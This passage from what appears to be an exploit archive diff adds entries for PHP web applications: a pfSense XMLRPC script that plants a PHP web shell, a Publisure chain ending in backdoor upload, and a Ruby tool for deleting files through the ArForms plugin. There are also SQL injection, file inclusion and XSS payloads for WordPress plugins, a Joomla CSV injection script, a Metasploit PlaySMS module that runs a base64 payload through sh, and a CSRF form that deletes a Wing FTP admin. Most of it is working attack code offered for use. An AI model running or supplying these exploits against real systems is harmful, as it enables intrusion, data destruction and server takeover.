$userVal['pluginUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/admin/monitoringplugins.php';
$userVal['profileGenUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/includes/components/profile/profile.php?cmd=download';
return $userVal;
}
function checkCookie() {
if (file_exists('cookie.txt')) {
echo "cookie.txt already exists - delete prior to running";
exit(1);
}
}

97
exploits/php/webapps/47359.txt Normal file
View file

@ -0,0 +1,97 @@
#####################################################################################
# Exploit Title: [PUBLISURE : From 0 to local Administrator (3 vulns) exploit-chain]
# Google Dork: [N/A]
# Date: [05/09/2019]
# Exploit Author: [Bourbon Jean-Marie (@kmkz_security) - Hacknowledge company]
# Vendor Homepage: [https://www.publisure.com/]
# Software Link: [N/C]
# Version: [version 2.1.2]
# Tested on: [Windows 7 Enterprise]
# CVE : [CVE-2019-14252, CVE-2019-14253, CVE-2019-14254]
#####################################################################################
# Improper Access Control
#
# CVSSv3: 7.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
# OVE ID: OVE-20190724-0002
# CVE ID: CVE-2019-14253
#
#####################################################################################
# (Pre-Authenticated) Multiples SQL injection
#
# CVSSv3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)
# OVE ID: OVE-20190724-0003
# CVE ID: CVE-2019-14254
#
#####################################################################################
# Unrestricted File Upload RCE
#
# CVSSv3: 9.1(CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
# OVE ID: OVE-20190724-0004
# CVE ID: CVE-2019-14252
#
#####################################################################################
# Fixes:
# Upgrade to latest product version and/or contact support for patches
#####################################################################################
I. PRODUCT
Publisure Hybrid mail is a highly efficient and cost effective alternative to traditional methods of producing and posting correspondence within an organization.
The Publisure system can either be used for centralized, internal production within your existing facilities or alternatively, it can be implemented as a fully outsourced solution.
Note that this advisory is based on a version 2.1.2 which is a legacy version since a newer one was released.
II. ADVISORY
A combination of three different vulnerabilities permits an unauthenticated attacker to gain Administrator access on the server hosting Publisure application.
III. VULNERABILITIES DESCRIPTIONS
a) The first issue permits to bypass authentication mechanism allowing malicious person to perform query on PHP forms within the /AdminDir folder that should be restricted.
b) The second weakness is that SQL queries are not well sanitized resulting in multiple SQL injection in "userAccFunctions.php" functions.
Using this two steps, an attacker can access passwords and/or grant access to user account "user" in order to become "Administrator" (for example).
c) Once successfully authenticated as an administrator, he is able to inject PHP backdoor by using "adminCons.php" form.
This backdoor will then be stored in E:\PUBLISURE\webservice\webpages\AdminDir\Templates\ folder even if removed from "adminCons.php" view (permitting to hide the malicious PHP file).
IV. PROOF OF CONCEPT
a) Access to AdminDir PHP scripts and database querying is possible whithout authentication (ex: http://192.168.13.37/AdminDir/editUser.php?id=2)
b) Vulnerable URL example: http://192.168.13.37/AdminDir/editUser.php?id=sqli
"editUser.php" vulnerable code: $user = getUserDtails($_GET['id']);
"userAccFunctions.php" vulnerable code example:
function getUserDtails($id) {
global $db;
//The reseller_accounts table has been used to store department information since PDQit
$Q = "SELECT a.username as username,a.contact_firstname,a.contact_lastname,a.email,r.company_name, a.enabled, a.record_id, a.password, a.unique_identifier, a.reseller_id, a.approval, a.resourceEditType, a.docView FROM accounts a, reseller_accounts r WHERE r.record_id = a.reseller_id AND a.record_id = $id";
$R = $db->query($Q);
return $R;
}
c) "adminCons.php" form permits to upload leading to RCE and allow attacker to hide malicious PHP code stored within "/AdminDir/Templates" folder (ex: http://192.168.13.37/AdminDir/Templates/tata.php?c=whoami)
V. RECOMMENDATIONS
a) Restrict access to administrative (and other) folder when non authenticated.
b) Prepare SQL query before execution using PDO to escape injections.
c) Check file type on file upload forms to prevent PHP code upload instead of templates.
VI. TIMELINE
July 23th, 2019: Vulnerability identification
July 30th, 2019: First contact with the editor (Publisure) and vulnerabilities acknowledgement
August 13th, 2019: Contact to vendor to ask for fix - no reply
September 04th, 2019: Vendor was informed 24h before public disclosure
September 05th, 2019: public disclosure after 45 days
VIII. LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this advisory.
The applied disclosure policy is based on US CERT Responsible Disclosure Policy - https://www.us-cert.gov/vulnerability-disclosure-policy

167
exploits/php/webapps/47413.py Executable file
View file

@ -0,0 +1,167 @@
# Exploit Title: Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection
# Date: 23/09/2018
# Author: Nassim Asrir
# Vendor Homepage: https://www.pfsense.org/
# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/
# CVE: CVE-2019-16701
# Tested On: Windows 10(64bit) | Pfsense 2.3.4 / 2.4.4-p3
######################################################################################################
1 : About Pfsense:
==================
pfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more.
2 : Technical Analysis:
=======================
The pfsense allow users (uid=0) to make remote procedure calls over HTTP (XMLRPC) and the XMLRPC contain some critical methods which allow any authenticated user/hacker to execute OS commands.
XMLRPC methods:
pfsense.exec_shell
pfsense.exec_php
pfsense.filter_configure
pfsense.interfaces_carp_configure
pfsense.backup_config_section
pfsense.restore_config_section
pfsense.merge_config_section
pfsense.merge_installedpackages_section_xmlrpc
pfsense.host_firmware_version
pfsense.reboot
pfsense.get_notices
system.listMethods
system.methodHelp
system.methodSignature
As we see in the output we have two interesting methods: pfsense.exec_shell and pfsense.exec_php.
2 : Static Analysis:
====================
In the static analysis we will analysis the xmlrpc.php file.
Line (73 - 82)
This code check if the user have enough privileges.
$user_entry = getUserEntry($username);
/*
* admin (uid = 0) is allowed
* or regular user with necessary privilege
*/
if (isset($user_entry['uid']) && $user_entry['uid'] != '0' &&
!userHasPrivilege($user_entry, 'system-xmlrpc-ha-sync')) {
log_auth("webConfigurator authentication error for '" .
$username . "' from " . $this->remote_addr .
" not enough privileges");
Line (137 - 146)
This part of code is the interest for us.
As we can see, first we have a check for auth then we have the dangerous function (eval) which take as parametere ($code).
public function exec_php($code) {
$this->auth();
eval($code);
if ($toreturn) {
return $toreturn;
}
return true;
}
Line (155 - 160)
In this part of code also we have a check for auth then the execution for ($code)
public function exec_shell($code) {
$this->auth();
mwexec($code);
return true;
}
3 - Exploit:
============
#!/usr/bin/env python
import argparse
import requests
import urllib2
import time
import sys
import string
import random
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Target Uri https://127.0.0.1")
parser.add_argument("--password", help = "pfsense Password")
args = parser.parse_args()
rhost = args.rhost
password = args.password
print ""
print "[+] CVE-2019-16701 - Pfsense - Remote Code Injection"
print ""
print "[+] Author: Nassim Asrir"
print ""
command = "<?xml version='1.0' encoding='iso-8859-1'?>"
command += "<methodCall>"
command += "<methodName>pfsense.host_firmware_version</methodName>"
command += "<params>"
command += "<param><value><string>"+password+"</string></value></param>"
command += "</params>"
command += "</methodCall>"
stage1 = rhost + "/xmlrpc.php"
page = urllib2.urlopen(stage1, data=command).read()
print "[+] Checking Login Creds"
if "Authentication failed" in page:
print "[-] Wrong password :("
sys.exit(0)
else:
random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(32)])
print "[+] logged in successfully :)"
print "[+] Generating random file "+random+".php"
print "[+] Sending the exploit ....."
command = "<?xml version='1.0' encoding='iso-8859-1'?>"
command += "<methodCall>"
command += "<methodName>pfsense.exec_php</methodName>"
command += "<params>"
command += "<param><value><string>"+password+"</string></value></param>"
command += "<param><value><string>exec('echo \\'<pre> <?php $res = system($_GET[\"cmd\"]); echo $res ?> </pre>\\' > /usr/local/www/"+random+".php');</string></value></param>"
command += "</params>"
command += "</methodCall>"
stage1 = rhost + "/xmlrpc.php"
page = urllib2.urlopen(stage1, data=command).read()
final = rhost+"/"+str(random)+".php"
check = urllib2.urlopen(final)
print "[+] Checking ....."
if check.getcode() == 200:
print "[+] Yeah! You got your shell: " + final+"?cmd=id"
else:
print "[+] Sorry :( Shell not found check the path"

238
exploits/php/webapps/47443.rb Executable file
View file

@ -0,0 +1,238 @@
#!/usr/bin/env ruby
# Exploit Title: WordPress Arforms - 3.7.1
# CVE ID: CVE-2019-16902
# Date: 2019-09-27
# Exploit Author: Ahmad Almorabea
# Author Website: http://almorabea.net
# Updated version of the exploit can be found always at : http://almorabea.net/cve-2019-16902.txt
# Software Link: https://www.arformsplugin.com/documentation/changelog/
# Version: 3.7.1
#**************Start Notes**************
# You can run the script by putting the script name and then the URL and the URL should have directory the Wordpress folders.
# Example : exploit.rb www.test.com, and the site should have the Wordpress folders in it such www.test.com/wp-contnet.
# Pay attention to the 3 numbers at the beginning maybe you need to change it in other types like in this script is 143.
# But maybe in other forms maybe it's different so you have to change it accordingly.
# This version of the software is applicable to path traversal attack so you can delete files if you knew the path such ../../ and so on
# There is a request file with this Script make sure to put it in the same folder.
#**************End Notes****************
require "net/http"
require 'colorize'
$host = ARGV[0] || ""
$session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad"
def start_function ()
puts "It's a weird question to ask but let's start friendly I'm Arforms exploit, what's your name?".yellow
name = STDIN.gets
if $host == ""
puts "What are you doing #{name} where is the URL so we can launch the attack, please pay more attention buddy".red
exit
end
check_existence_arform_folder
execute_deletion_attack
puts "Done ... see ya " + name
end
def send_checks(files_names)
j = 1
while j <= files_names.length-1
uri = URI.parse("http://#{$host}/wp-content/uploads/arforms/userfiles/"+files_names[j])
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS
request = Net::HTTP::Get.new(uri.request_uri)
request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
request["Connection"] = "keep-alive"
request["Accept-Language"] = "en-US,en;q=0.5"
request["Accept-Encoding"] = "gzip, deflate"
request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
begin
response = http.request(request).code
puts "The File " + files_names[j] + " has the response code of " + response
rescue Exception => e
puts "[!] Failed!"
puts e
end
j = j+1
end
end
def check_existence_arform_folder ()
path_array = ["/wp-plugins/arforms","/wp-content/uploads/arforms/userfiles"]
$i = 0
results = []
while $i <= path_array.length-1
uri = URI.parse("http://#{$host}/#{path_array[$i]}")
#puts uri
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
results[$i] = response.code
#puts"response code is : " + response.code
$i +=1
end
puts "****************************************************"
if results[0] == "200" || results[0] =="301"
puts "The Plugin is Available on the following path : ".green + $host + path_array[0]
else
puts "We couldn't locate the Plugin in this path, you either change the path or we can't perform the attack, Simple Huh?".red
exit
end
if (results[1] == "200" || results[1] == "301")
puts "The User Files folder is Available on the following path : ".green + $host + path_array[1]
else
puts "We couldn't find the User Files folder, on the following path ".red + $host + path_array[1]
end
puts "****************************************************"
end
def execute_deletion_attack ()
puts "How many file you want to delete my man"
amount = STDIN.gets.chomp.to_i
if(amount == 0)
puts "You can't use 0 or other strings this input for the amount of file you want to delete so it's an Integer".blue
exit
end
file_names = []
file_names[0] = "143_772_1569713145702_temp3.txt"
j = 1
while j <= amount.to_i
puts "Name of the file number " + j.to_s
file_names[j] = STDIN.gets
file_names[j].strip!
j = j+1
end
uri = URI.parse("http://#{$host}")
#puts uri
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https'
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
global_cookie = response.response['set-cookie'] + "; PHPSESSID="+$session_id #Assign the session cookie
$i = 0
while $i <= file_names.length-1
puts "Starting the Attack Journey .. ".green
uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
headers =
{
'Referer' => 'From The Sky',
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
'Content-Type' => 'multipart/form-data; boundary=---------------------------14195989911851978808724573615',
'Accept-Encoding' => 'gzip, deflate',
'Cookie' => global_cookie,
'X_FILENAME' => file_names[$i],
'X-FILENAME' => file_names[$i],
'Connection' => 'close'
}
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https'
request = Net::HTTP::Post.new(uri.path, headers)
request.body = File.read("post_file")
response = http.request request
$i = $i +1
end
execute_delete_request file_names,global_cookie,amount.to_i
puts "Finished.........."
end
def execute_delete_request (file_names,cookies,rounds )
$i = 0
while $i <= file_names.length-1
puts "Starting the Attack on file No #{$i.to_s} ".green
uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
headers =
{
'Referer' => 'From The Sky',
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
'Accept' => '*/*',
'Accept-Language' => 'en-US,en;q=0.5',
'X-Requested-With'=> 'XMLHttpRequest',
'Cookie' => cookies,
'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',
'Accept-Encoding' => 'gzip, deflate',
'Connection' => 'close'
}
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https'
request = Net::HTTP::Post.new(uri.path,headers)
request.body = "action=arf_delete_file&file_name="+file_names[$i]+"&form_id=143"
response = http.request(request)
if $i != 0
puts "File Name requested to delete is : " + file_names[$i] + " has the Response Code of " + response.code
end
$i = $i +1
end
send_checks file_names
end
start_function()

28
exploits/php/webapps/48023.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: VehicleWorkshop 1.0 - 'bookingid' SQL Injection
# Data: 2020-02-06
# Exploit Author: Mehran Feizi
# Vendor HomagePage: https://github.com/spiritson/VehicleWorkshop
# Tested on: Windows
# Google Dork: N/A
=========
Vulnerable Page:
=========
/viewtestdrive.php
==========
Vulnerable Source:
==========
Line6: if(isset($_GET['testid']))
Line8: $results = mysql_query("DELETE from testdrive where bookingid ='$_GET[testid]'");
Line11: if(isset($_GET['testbid']))
Line13: $results = mysql_query("UPDATE testdrive SET status='Approved' where bookingid ='$_GET[testbid]'");
Line16: if(isset($_GET['testbida']))
Line:18: $results = mysql_query("UPDATE testdrive SET status='Rejected' where bookingid ='$_GET[testbida]'");
=========
POC:
=========
http://site.com/viewtestdrive.php?bookingid=[SQL]

39
exploits/php/webapps/48058.txt Normal file
View file

@ -0,0 +1,39 @@
# Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/tutor/
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
7: include include $include_file;
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================
contact me:
telegram: @MF0584
gmail: mehranfeizi13841384@gmail.com
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
7: include include $include_file;
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================

18
exploits/php/webapps/48059.txt Normal file
View file

@ -0,0 +1,18 @@
# Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/tutor/
===================================================================
Vulnerable page:
/Quiz.php
===================================================================
Vulnerable Source:
473: echo echo $topic_id;
447: $topic_id = sanitize_text_field($_POST['topic_id']);
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/classes/Quiz.php
$_POST('topic_id') = <script>alert('mehran')</script>
=================================================================================

14
exploits/php/webapps/48061.txt Normal file
View file

@ -0,0 +1,14 @@
# Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/wordfence/
==============================================================================
Vulnerable Source:
5662: readfile readfile($localFile);
5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file']));
=================================================================================
Exploit:
localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD]
=================================================================================

39
exploits/php/webapps/48062.txt Normal file
View file

@ -0,0 +1,39 @@
# Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-11
# vendor home page: https://wordpress.org/plugins/contact-form-7/
Vulnerable Source:
134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file))
82: $file = $_FILES[$name] : null;
132: $new_file = path_join($uploads_dir, $filename);
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir);
121: $uploads_dir = wpcf7_upload_tmp_dir();
131: $filename = wp_unique_filename($uploads_dir, $filename);
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir);
121: $uploads_dir = wpcf7_upload_tmp_dir();
128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag);
126: $filename = wpcf7_antiscript_file_name ($filename);
125: $filename = wpcf7_canonicalize ($filename, 'as-is');
124: $filename = $file['name'];
82: $file = $_FILES[$name] : null;
82: $file = $_FILES[$name] : null;
78: ⇓ function wpcf7_file_validation_filter($result, $tag)
Exploit:
<?php
$shahab="file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$shahab"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
Location File:
http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg

19
exploits/php/webapps/48065.txt Normal file
View file

@ -0,0 +1,19 @@
# Title : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
# Author : mehran feizi
# Vendor : https://wordpress.org/plugins/ultimate-member/
# Category : Webapps
# Date : 2020-02-11
# Vendor home page: https://wordpress.org/plugins/ultimate-member/
Vulnerable Page:
/class-admin-upgrade.php
Vulnerable Source:
354: if(empty($_POST['pack'])) else
356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php';
Exploit:
localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php
$_POST('pack')=<script>alert('xss')</script>

29
exploits/php/webapps/48088.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Wordpress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting
# Date: 2020-02-15
# Exploit Author: Shahab.ra.9
# Vendor Homepage: https://products-filter.com/
# Software Link: https://wordpress.org/plugins/woocommerce-products-filter/
# Version: 1.2.3
# Tested on: windows 10
# WOOF - Products Filter for WooCommerce
Exploit:
http://target/wp-admin/admin.php?page=wc-settings&tab=woof
now in tab "design" -> then enter (xss code) in the (textfields) front side
->(Text for block toggle ,Text for block toggle , Custom front css styles
file link).
then click on button "save changes".
then refresh page ,now you see the execution of xss code ,then refersh
frontend page site -> "http://target/shop/ " or frontend pages used this
plugin the execution of xss code.
Demo Poc:
http://target/wp-admin/admin.php?page=wc-settings&tab=woof
now in tab "design" -> then enter ( ";</script><img src=1
onerror="alert(`xss store bug -> shahab.ra.9`);"><script>var1="1 ) in the
(textfields) front side ->(Text for block toggle ,Text for block toggle and
Custom front css styles file link).
then click on button "save changes".

31
exploits/php/webapps/48093.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting
# Dork:N/A
# Date: 2020-02-17
# Exploit Author: UltraSecurityTeam
# Team Member = Ashkan Moghaddas , AmirMohammad Safari , Behzad khalife , Milad Ranjbar
# Vendor Homepage: UltraSec.Org
# Software Link: https://downloads.wordpress.org/plugin/wp-sitemap-page.zip
# Tested on: Windows/Linux
# Version: 1.6.2
.:: Plugin Description ::.
An easy way to add a sitemap on one of your pages becomes reality thanks to this WordPress plugin. Just use the shortcode [wp_sitemap_page] on any of your pages. This will automatically generate a sitemap of all your pages and posts
.:: Proof Of Concept (PoC) ::.
Step 1 - Open WordPress Setting
Step 2 - Open Wp Sitemap Page
Step 3 - Inject Your Java Script Codes to Exclude pages
Step 4 - Click Button Save Changes
Step 5 - Run Your Payload
.:: Tested Payload ::.
'>"><script>alert(/XSS By UltraSecurity/)</script>
.:: Post Request ::.
option_page=wp-sitemap-page&action=update&_wpnonce=de5e7c2417&_wp_http_referer=%2Fwp%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_sitemap_page%26settings-updated%3Dtrue&wsp_posts_by_category=&wsp_exclude_pages=%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS+By+UltraSecurity%2F%29%3C%2Fscript%3E&wsp_exclude_cpt_archive=1&wsp_exclude_cpt_author=1&submit=Save+Changes

43
exploits/php/webapps/48198.txt Normal file
View file

@ -0,0 +1,43 @@
#!/usr/bin/python3
# Exploit Title: Joomla 3.9.0 < 3.9.7 - CSV Injection
# Date: 2020-03-10
# Vulnerability Authors: Jose Antonio Rodriguez Garcia and Phil Keeble (MWR InfoSecurity)
# Exploit Author: Abdullah - @i4bdullah
# Vendor Homepage: https://www.joomla.org/
# Software Link: https://downloads.joomla.org/cms/joomla3/3-9-5/Joomla_3-9-5-Stable-Full_Package.zip?format=zip
# Version: 3.9.0 < 3.9.7
# Tested on: Ubuntu 18.04 LTS and Windows 7
# CVE : CVE-2019-12765
import mechanize
import sys
if (len(sys.argv) != 2):
print(f'Usage: {sys.argv[0]} <Base URL>')
print(f'Example: {sys.argv[0]} http://127.0.0.1 ')
sys.exit(1)
base_url = sys.argv[1]
reg_url = f"{base_url}/joomla/index.php/component/users/?view=registration&Itemid=101"
login_url = f"{base_url}/joomla/index.php?option=com_users"
def pwn(username='abdullah'):
payload = "=cmd|'/c calc.exe'!A1"
print(f"Registering a new user with the name <{payload}>...")
reg_form = mechanize.Browser()
reg_form.set_handle_robots(False)
reg_form.open(reg_url)
reg_form.select_form(nr=0)
reg_form.form['jform[name]'] = payload
reg_form.form['jform[username]'] = username
reg_form.form['jform[password1]'] = 'password'
reg_form.form['jform[password2]'] = 'password'
reg_form.form['jform[email1]'] = 'whatever@i4bdullah.com'
reg_form.form['jform[email2]'] = 'whatever@i4bdullah.com'
reg_form.submit()
print("The exploit ran successfully.")
print("Exiting...")
sys.exit(0)
pwn()

189
exploits/php/webapps/48199.txt Normal file
View file

@ -0,0 +1,189 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'PlaySMS 1.4.3 Pre Auth Template Injection Remote Code
Execution',
'Description' => %q{
This module exploits a Preauth Server-Side Template Injection
leads remote code execution vulnerability in PlaySMS Before Version 1.4.3.
This issue is caused by Double processes a server-side template
by Custom PHP Template system called 'TPL'.
which is used in PlaySMS template engine location
src/Playsms/Tpl.php:_compile(). When Attacker supply username with a
malicious payload
and submit. This malicious payload first process by TPL and
save the value in the current template after this value goes for the second
process
which result in code execution.
The TPL(https://github.com/antonraharja/tpl) template language
is vulnerable to PHP code injection.
This module was tested against PlaySMS 1.4 on HackTheBox's
Forlic Machine.
},
'Author' =>
[
'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit
Module
'Lucas Rosevear' # Found and Initial PoC by NCC Groupd
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE','2020-8644'],
['URL','
https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
']
],
'DefaultOptions' =>
{
'SSL' => false,
'PAYLOAD' => 'cmd/unix/reverse_python'
},
'Privileged' => false,
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'python'
}
},
'Targets' =>
[
[ 'PlaySMS Before 1.4.3', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 05 2020'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base playsms directory path",
'/']),
])
end
def uri
return target_uri.path
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php')
})
rescue
vprint_error('Unable to access the index.php file')
return CheckCode::Unknown
end
if res.code == 302 &&
res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
return Exploit::CheckCode::Appears
end
return CheckCode::Safe
end
#Send Payload in Login Request
def login
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'vars_get' => {
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
}
})
# Grabbing CSRF token from body
/name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine
CSRF token") if csrf.nil?
vprint_good("X-CSRF-Token for login : #{csrf}")
cookies = res.get_cookies
vprint_status('Trying to Send Payload in Username Field ......')
#Encoded in base64 to avoid HTML TAGS which is filter by Application.
evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64
-d |sh`}}"
# Send Payload with cookies.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
'op' => 'login',
}.to_a.shuffle],
'vars_post' => Hash[{
'X-CSRF-Token' => csrf,
'username' => evil,
'password' => ''
}.to_a.shuffle],
})
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to
Login request") if res.nil?
# Request Status Check
if res.code == 302
print_good("Payload successfully Sent")
return cookies
else
fail_with(Failure::UnexpectedReply, "#{peer} - Something Goes
Wrong")
end
end
def exploit
cookies = login
vprint_status("Cookies here : #{cookies}")
# Execute Last Sent Username.
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'cookie' => cookies,
'vars_get' => {
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
}
})
end
end
--
Touhid Shaikh
Exploit Researcher and Developer | Security Consultant
m: +91 7738794435
e: touhidshaikh22@gmail.com
www.touhidshaikh.com [image: Facebook icon]
<https://www.facebook.com/tauheeds1> [image: LinkedIn icon]
<https://www.linkedin.com/in/touhidshaikh22/> [image: Twitter icon]
<https://twitter.com/touhidshaikh22> [image: Youtube icon]
<https://www.youtube.com/touhidshaikh22>
The content of this email is confidential and intended for the recipient
specified in message only. It is strictly forbidden to share any part of
this message with any third party, without a written consent of the sender.
If you received this message by mistake, please reply to this message and
follow with its deletion, so that we can ensure such a mistake does not
occur in the future.

319
exploits/php/webapps/48200.txt Normal file
View file

@ -0,0 +1,319 @@
# Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation
# Date: 2020-03-10
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: https://www.wftpserver.com
# Version: v6.2.6
# Tested on: Windows 10
*Summary:*
An authenticated CSRF exists in web client and web administration of Wing
FTP v6.2.6, a crafted HTML page could delete admin user from the
application where as administration needs to re-install the program and add
admin user again. Issue was patched in v6.2.7.
*Proof of concept:*
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://IP:5466/admin_delete_admin.html" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="r" value="0&#46;9219583354400562" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
*Patch (lua/cgiadmin.lua):*
URL: https://www.wftpserver.com/serverhistory.htm
local outfunc = "echo"
local function out (s, i, f)
s = string.sub(s, i, f or -1)
if s == "" then return s end
s = string.gsub(s, "([\\\n\'])", "\\%1")
s = string.gsub(s, "\r", "\\r")
return string.format(" %s('%s'); ", outfunc, s)
end
local function translate (s)
s = string.gsub(s, "<%%(.-)%%>", "<??lua %1 ??>")
local res = {}
local start = 1
while true do
local ip, fp, target, exp, code = string.find(s, "<%?%?(%w*)[
\t]*(=?)(.-)%?%?>", start)
if not ip then break end
table.insert(res, out(s, start, ip-1))
if target ~= "" and target ~= "lua" then
table.insert(res, out(s, ip, fp))
else
if exp == "=" then
table.insert(res, string.format(" %s(%s);", outfunc, code))
else
table.insert(res, string.format(" %s ", code))
end
end
start = fp + 1
end
table.insert(res, out(s, start))
return table.concat(res)
end
local function compile (src, chunkname)
return loadstring(translate(src),chunkname)
end
function include (filename, env)
if incfiles[filename] == nil then
incfiles[filename] = true;
path = c_GetAppPath()
path = path .. "/webadmin/"..filename
local errstr = string.format("<b>The page '%s' does not
exist!</b>",filename)
local fh,_ = io.open (path)
if not fh then
echo_out = echo_out..errstr
return
end
local src = fh:read("*a")
fh:close()
local prog = compile(src, path)
local _env
if env then
_env = getfenv (prog)
setfenv (prog, env)
end
local status,err = pcall(prog)
if not status then
if type(err) == "string" and not string.find(err,"exit function!") then
print(string.format("some error in %s!",err))
end
return
end
end
end
function var_dump(var)
print("{")
if type(var) == "string" or type(var) == "number" or type(var) == "boolean"
or type(var) == "function" then
print(var)
elseif(type(var) == "thread") then
print("thread")
elseif(type(var) == "userdata") then
print("userdata")
elseif type(var) == "nil" then
